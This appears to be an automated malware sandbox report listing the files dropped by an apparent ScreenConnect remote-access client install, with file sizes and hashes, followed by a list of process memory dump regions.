490935a70688526ef8d5bcc4d0f960df0632fba86e42a287f9840a046001ba53e95ded64fc996daa647c6b4bdcdf1f0e3d154813184de82395e1d29abf05039e

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe

Filesize
341KB

MD5
4a820314b86c1ba9eb098f92dcb636b6

SHA1
e72b50a1ce1515cfdd7d25a04392fa8bb47f3b6c

SHA256
dbe329dfe3fd4a76d104b22f67953506272747e1b32830155ce520a920366135

SHA512
e19901cb44f448a687ba7ac47a8befd1bf2e987064dc9213d1ca68d81041164dc832599758247ad1f146595169b88fcf2bb6385fbe5b963269a93bf6f279bb07

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe

Filesize
222KB

MD5
7fb3aa975dc66867ee696b0f2a4aec4a

SHA1
240c4e5534b3bc4dbdc2848cf5433c54f420c32e

SHA256
a2d21c3f95542dc78bf6152cc68eaf6be8fa4c25a897101fda763976a8362d3d

SHA512
1815498356253147a800947eba684b3d7d13066eda5aaf7fb8be3210430334fdce6e240ef09dd2f56894627c9ca59e35440bbdfa01e742331bd6111393dddcbe

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe.config

Filesize
266B

MD5
728175e20ffbceb46760bb5e1112f38b

SHA1
2421add1f3c9c5ed9c80b339881d08ab10b340e3

SHA256
87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

SHA512
fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\app.config

Filesize
1KB

MD5
1807bc28da12a3ea9c5b28b4df4062ed

SHA1
16a33ed6f7dd65c10882284ee92a7f7e9f9a1bc2

SHA256
baca85c0e0ec3dfccb31f77dce14486f1eaf776e2afa18e3c6e0b44b8d8a1706

SHA512
c034565f12cf79c746fe2c19a07e85ad63504ee3f51df2ef12eacc8cf1dc88c0472726b64533810aef3267f1721ca147a94add29e414851262489a6bf7eb608c

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\system.config

Filesize
899B

MD5
5768c08ad4422850c8ccb2df2add6c46

SHA1
2d63833344efce93991d1cf9e5aead37440ab10a

SHA256
b1ee9fd52ee6e90961687ada828c83c37f6db0b1e34bcda742dd46596f43b4ae

SHA512
e4c1c748baf6ee380ae8f3a3c652f55530b0c212e7932c97994fc2609d29cb202eea22594ad4a0471c65f9e82d48b602936168c7e5e1206deb1a1150863df4a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI3A1B.tmp

Filesize
1008KB

MD5
5f6ad2b5b34d0e8ad9fa9055423bca23

SHA1
9ce6f887bc287bdd0321937d190c79f58918db3b

SHA256
2a13ca204e47abc63fff05479da2ccabef97a3b9d529b15d392c1ba6de9616f5

SHA512
cb4583bc5dc9bfab8a02a221b2b5c33023aa5d1333155a320a85e57b1cd95e976ca23b0897dba180052a9101bd55bf6a49bc3f469c25e37c985c1f4d32ba7ae8

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI3A1B.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Filesize
172KB

MD5
5ef88919012e4a3d8a1e2955dc8c8d81

SHA1
c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

SHA256
3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

SHA512
4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI3A1B.tmp-\ScreenConnect.Core.dll

Filesize
446KB

MD5
cfd9cd30f406354bb944873f19489647

SHA1
95db009881894236c5c1922716c6576acbdb0545

SHA256
98c00de265d8050f23a332e55628713d984d4d20094ca486da73ba5a9fd81bc8

SHA512
7756d452f2d4ef38ada3bd1e17b6d7807b7c5b90f2d38d701b74c34165087f6f92a8b7704db2678c8713ad1e0e4d207de0d86afe0d674f55bfe97372b951d0c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI3A1B.tmp-\ScreenConnect.InstallerActions.dll

Filesize
20KB

MD5
e0b7cf71221699f2e984cd9f7c1001cc

SHA1
6188c79fd6529c16cc87b081a00fef7b2abe7ede

SHA256
8304fb6b333037d9bd9f65d99cb21918add1c3d0334f754d23c98bcf45c50a22

SHA512
1a6189610b1620fd11373841ebdeae9f553a6c9b5f1cad57afcbe9bfb2b571fc34824cd133281f266111445ca07cb8d13abdd8a179cf1744164a15352eaa94b6

Download Submit
C:\Windows\Installer\MSI50D0.tmp

Filesize
202KB

MD5
ba84dd4e0c1408828ccc1de09f585eda

SHA1
e8e10065d479f8f591b9885ea8487bc673301298

SHA256
3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

SHA512
7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

Download Submit
C:\Windows\Installer\e575023.msi

Filesize
534KB

MD5
203ae9ac41391b594ff6d8d948893af7

SHA1
40d3f46aa94900654f1a3406327c80d2c8f3468a

SHA256
d35bcaff3b17820c9b294d7c5e0628bbb86a439f18e2a3b37468014da992b294

SHA512
d682cef651176c0b4c285970655273a5440931ae5f4fd5f70a50121c40322a6458ca8cd0399e7c264132454117f1eba4638d4ddfe757aa99ba8db92b976fc951

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
12.8MB

MD5
b8d5edee27d115ddedb794c50b9ff8a7

SHA1
ef888c7efdb16eb574d9abc256259e34fed4835a

SHA256
afcfb43fd7c2ab0753f4800f8d62307d22b4ca4399f035224b1b63f8077171bf

SHA512
fca6784c1a884495fc215e1a11a82e89ca5816051a892946b89515574fe1404aea50745ea37176c9db6f2257ef0fdc728bdf7ab8723a7fea536e494e6a63fd64

Download Submit
\??\Volume{d1929823-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{71dce3f8-223e-465f-8e3a-2e9530614354}_OnDiskSnapshotProp

Filesize
6KB

MD5
22716ac018ab91ba0d90492b6f1ab7b8

SHA1
00cb8f34f621446ad54b5a8e38f1c77e172d0a74

SHA256
66eabf6c18e524a742634d5db6fc2cd717567ac0be3e146946915f61688d3384

SHA512
b5bcd403c93bff72559db8b0f8638e97838b39d6ff89b236ebc06d42b643d43abb70cd5cec81cfb575b8d069656cfbfc4fe92bbc657d53901cc1442edef1b204

Download Submit
memory/864-28-0x00000000057B0000-0x0000000005826000-memory.dmp

Filesize
472KB

Download
memory/864-24-0x0000000005720000-0x000000000572C000-memory.dmp

Filesize
48KB

Download
memory/864-19-0x00000000056D0000-0x00000000056E0000-memory.dmp

Filesize
64KB

Download
memory/864-12-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/864-20-0x00000000056D0000-0x00000000056E0000-memory.dmp

Filesize
64KB

Download
memory/864-18-0x00000000056D0000-0x00000000056E0000-memory.dmp

Filesize
64KB

Download
memory/864-16-0x00000000056E0000-0x000000000570E000-memory.dmp

Filesize
184KB

Download
memory/864-17-0x00000000056D0000-0x00000000056E0000-memory.dmp

Filesize
64KB

Download
memory/864-39-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/3004-131-0x00007FFF99930000-0x00007FFF9A3F2000-memory.dmp

Filesize
10.8MB

Download
memory/3004-133-0x000000001BB40000-0x000000001BCDE000-memory.dmp

Filesize
1.6MB

Download
memory/3004-141-0x00007FFF99930000-0x00007FFF9A3F2000-memory.dmp

Filesize
10.8MB

Download
memory/3004-129-0x0000000000900000-0x000000000098E000-memory.dmp

Filesize
568KB

Download
memory/3004-130-0x0000000001320000-0x0000000001352000-memory.dmp

Filesize
200KB

Download
memory/3004-135-0x00000000012A0000-0x00000000012B0000-memory.dmp

Filesize
64KB

Download
memory/3004-134-0x000000001C960000-0x000000001CAE8000-memory.dmp

Filesize
1.5MB

Download
memory/3004-132-0x000000001B920000-0x000000001B996000-memory.dmp

Filesize
472KB

Download
memory/3160-103-0x0000000003C00000-0x0000000003D9E000-memory.dmp

Filesize
1.6MB

Download
memory/3160-89-0x00000000749F0000-0x00000000751A1000-memory.dmp

Filesize
7.7MB

Download
memory/3160-96-0x00000000038F0000-0x0000000003922000-memory.dmp

Filesize
200KB

Download
memory/3160-110-0x00000000042C0000-0x0000000004310000-memory.dmp

Filesize
320KB

Download
memory/3160-104-0x0000000004350000-0x00000000048F6000-memory.dmp

Filesize
5.6MB

Download
memory/3160-92-0x0000000003A50000-0x0000000003A60000-memory.dmp

Filesize
64KB

Download
memory/3160-88-0x0000000001290000-0x00000000012A0000-memory.dmp

Filesize
64KB

Download
memory/3160-138-0x00000000749F0000-0x00000000751A1000-memory.dmp

Filesize
7.7MB

Download
memory/3160-139-0x0000000003A50000-0x0000000003A60000-memory.dmp

Filesize
64KB

Download
memory/3160-140-0x0000000003A50000-0x0000000003A60000-memory.dmp

Filesize
64KB

Download
memory/3160-107-0x0000000003F30000-0x00000000040B8000-memory.dmp

Filesize
1.5MB

Download